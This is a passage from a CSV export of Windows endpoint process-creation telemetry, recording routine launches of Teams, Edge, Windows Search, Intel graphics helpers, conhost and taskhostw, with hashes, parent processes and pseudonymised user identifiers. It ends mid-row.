01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:55.587942600+00:00,2021-06-23 00:52:50.757073100+00:00,40f2c921-891e-4f7f-8cb5-6c31b9b2276c,computerpii_0a470890c60768167990033d701e7bd881398861,155030,False,10.7740.19041.1052,False,11540474045171817,,11540474045171882,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1281,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:56.404813700+00:00,1828,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6580 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:56.714826800+00:00,2021-06-23 00:52:50.757219500+00:00,d37307a6-a333-4f4c-8831-d6eeec65ee5a,computerpii_0a470890c60768167990033d701e7bd881398861,155035,False,10.7740.19041.1052,False,11540474045171833,,11540474045171883,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1282,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:56.420216800+00:00,9528,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6188 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:56.715589300+00:00,2021-06-23 00:52:50.757248900+00:00,63d371ac-c607-4164-88c7-044e31ac32b5,computerpii_0a470890c60768167990033d701e7bd881398861,155036,False,10.7740.19041.1052,False,11540474045171833,,11540474045171884,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1283,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:51:57.715705+00:00,16832,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:51:57.959361+00:00,2021-06-23 00:52:50.757453600+00:00,f01065e1-7a92-461d-b4f3-8c27aa24b133,computerpii_0a470890c60768167990033d701e7bd881398861,155045,False,10.7740.19041.1052,False,11540474045171833,,11540474045171885,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1284,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:52:01.201240400+00:00,2080,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --no-sandbox --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=5624 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:01.216452600+00:00,2021-06-23 00:52:50.758129200+00:00,72b1ca72-c6ea-46a7-8f2b-187353549656,computerpii_0a470890c60768167990033d701e7bd881398861,155067,False,10.7740.19041.1052,False,11540474045171817,,11540474045171887,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1285,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:52:05.218511200+00:00,19076,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=password_manager.breach_detection.mojom.EdgePasswordDataProcessor --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7120 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:05.266439100+00:00,2021-06-23 00:52:50.759070500+00:00,660a911d-32df-4f31-aca4-a3fb635b8b44,computerpii_0a470890c60768167990033d701e7bd881398861,155099,False,10.7740.19041.1052,False,11540474045171833,,11540474045171891,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,msedge.exe,20024,256,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1286,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:52:09.969992+00:00,12296,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320625_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320625 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:10.185940900+00:00,2021-06-23 00:52:50.759948700+00:00,21a7efc5-540c-4b4f-b8cc-471242d5a72d,computerpii_0a470890c60768167990033d701e7bd881398861,155129,False,10.7740.19041.1052,False,11540474045144190,,11540474045171893,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1287,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:52:20.999187+00:00,11908,GfxDownloadWrapper.exe,"""GfxDownloadWrapper.exe"" https://gameplayapi.intel.com/api/games/getagsgames2/i510210U/?AGS ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Intel\Games\Temp\i510210U.json"" Encoding",PortableExecutable,2021-02-15 00:31:06.091571600+00:00,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\GfxDownloadWrapper.exe,171272,db43f9e1e0e9eb357b24132a2d25ca7a,d5f5f209deff9a35a31df6cb0d67133f3d29b1abbe5b8ee139585a6ac2646d0d,3baba66a80231a1160345c1f7a107789cd27dd06,b8fd0897854f7981f167e1777cd0dc9d,0eba09e7418a9d87da1edbfb77139d45af7ab11fa12ccdedb7580748eb600e2e,4a8d6e7d0e1f66810ba25052c964ddcdfa64e6eb,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.382590800+00:00,16300,igfxEM.exe,"""igfxEM.exe""",False,2021-06-10 00:46:10.990538100+00:00,2852,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxCUIService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:21.009717400+00:00,2021-06-23 00:52:50.760766400+00:00,86d01027-66e3-453e-9838-0aa439742db3,computerpii_0a470890c60768167990033d701e7bd881398861,155161,False,10.7740.19041.1052,False,11540474045171758,,11540474045171897,2021-06-23 00:51:19.382590800+00:00,16300,2021-06-23 00:51:19.382590800+00:00,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxEM.exe,16300,128,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65,905992,2020-06-16 21:27:23+00:00,2020-06-30 20:27:02+00:00,2021-06-23 00:51:19.376680500+00:00,2021-02-15 00:31:08.020416200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Intel Corporation,Intel(R) Common User Interface,6.15.100.8336,IGFXEM,IGFXEM.EXE,igfxEM Module,Intel Corporation,Intel® Graphics Control Panel,8.15.100.8336,GfxDownloadWrapper.exe,GfxDownloadWrapper.exe,Intel(R) Graphics Control Panel
+1288,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:52:21.016141300+00:00,8172,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,db43f9e1e0e9eb357b24132a2d25ca7a,d5f5f209deff9a35a31df6cb0d67133f3d29b1abbe5b8ee139585a6ac2646d0d,3baba66a80231a1160345c1f7a107789cd27dd06,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:52:20.999187+00:00,11908,GfxDownloadWrapper.exe,"""GfxDownloadWrapper.exe"" https://gameplayapi.intel.com/api/games/getagsgames2/i510210U/?AGS ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Intel\Games\Temp\i510210U.json"" Encoding",False,2021-06-23 00:51:19.382590800+00:00,16300,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\igfxEM.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:21.046161900+00:00,2021-06-23 00:52:50.760795100+00:00,0e9a1760-aba0-44e7-b6ad-20ab281e6391,computerpii_0a470890c60768167990033d701e7bd881398861,155162,False,10.7740.19041.1052,False,11540474045171897,,11540474045171898,2021-06-23 00:52:20.999187+00:00,11908,2021-06-23 00:52:20.999187+00:00,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65\GfxDownloadWrapper.exe,11908,128,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_7769fb49693b5f65,171272,2020-06-16 21:01:58+00:00,2020-06-30 20:26:16+00:00,2021-06-22 00:43:41.311334900+00:00,2021-02-15 00:31:06.091571600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Intel Corporation,Intel® Graphics Control Panel,8.15.100.8336,GfxDownloadWrapper.exe,GfxDownloadWrapper.exe,Intel(R) Graphics Control Panel,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1289,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 00:52:21.182917+00:00,19736,taskhostw.exe,taskhostw.exe $(Arg0),PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:52:21.225918500+00:00,2021-06-23 00:52:50.760982900+00:00,e342b68c-1a9a-4ff9-a72f-ec733617ff21,computerpii_0a470890c60768167990033d701e7bd881398861,155168,True,10.7740.19041.1052,False,11540474045136925,,11540474045171899,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 